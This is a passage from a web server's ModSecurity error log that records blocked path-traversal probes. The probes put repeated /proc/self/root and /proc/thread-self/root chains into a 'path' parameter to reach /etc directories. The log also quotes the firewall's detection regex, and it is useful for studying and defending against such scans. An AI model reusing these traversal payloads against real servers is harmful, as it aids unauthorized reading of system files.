"ablKcFKJy4A1bGlmj9BWKQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:34:57.382910 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:49010] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKcQeiSKl8TjouI-YCnQAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:58.667889 2026] [:error] [pid 2553:tid 140411641214720] [client 74.7.243.203:49012] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKcv0Bec_B9OkZP_i9egAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:34:59.952656 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:49020] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKc5qmL8PQht4WJFlIRgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:00.242614 2026] [:error] [pid 1210:tid 140411565680384] [client 74.7.241.46:37236] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKdFKJy4A1bGlmj9BWLQAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:01.329309 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.243.203:39906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKde82sZHvlq4xgHrCzQAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:35:03.270178 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.243.203:39922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKd5DEJR9VXonE_-1PcwAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:04.669553 2026] [:error] [pid 1016:tid 140411658000128] [client 74.7.243.203:39928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKeJqmL8PQht4WJFlISgAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:35:06.263404 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.243.203:39944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKedCmCSWTlPouqorMWgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:07.632923 2026] [:error] [pid 11469:tid 140411616036608] [client 74.7.243.203:39956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKe5DEJR9VXonE_-1PdAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:35:08.943253 2026] [:error] [pid 1731:tid 140411624429312] [client 74.7.243.203:39962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKfAb2qCuy5irgBMjJyQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:09.175123 2026] [:error] [pid 1731:tid 140411699963648] [client 74.7.243.203:39962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKfQb2qCuy5irgBMjJygAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:13.537630 2026] [:error] [pid 2553:tid 140411540502272] [client 74.7.241.46:49752] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKgP0Bec_B9OkZP_i9hAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:35:14.927056 2026] [:error] [pid 2159:tid 140411699963648] [client 74.7.241.46:52494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKgvct6CQ8jnRyg2p8zgAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:15.717633 2026] [:error] [pid 1731:tid 140411548894976] [client 74.7.243.203:50664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKgwb2qCuy5irgBMjJ1AAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:35:17.636770 2026] [:error] [pid 2159:tid 140411557287680] [client 74.7.241.46:52498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKhfct6CQ8jnRyg2p80QAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:35:18.045393 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:50672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKhqBJNF7axNlVR0X9RwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:35:18.964529 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.241.46:47604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKhtCmCSWTlPouqorMXgAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:20.129297 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:47616] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKiO82sZHvlq4xgHrC1QAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:35:28.239237 2026] [:error] [pid 2159:tid 140411683178240] [client 74.7.243.203:50684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKkPct6CQ8jnRyg2p83wAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:28.457840 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.241.46:47618] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKkJqmL8PQht4WJFlIWwAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:29.532030 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:35504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKkZqmL8PQht4WJFlIXwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:36.179346 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:33642] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 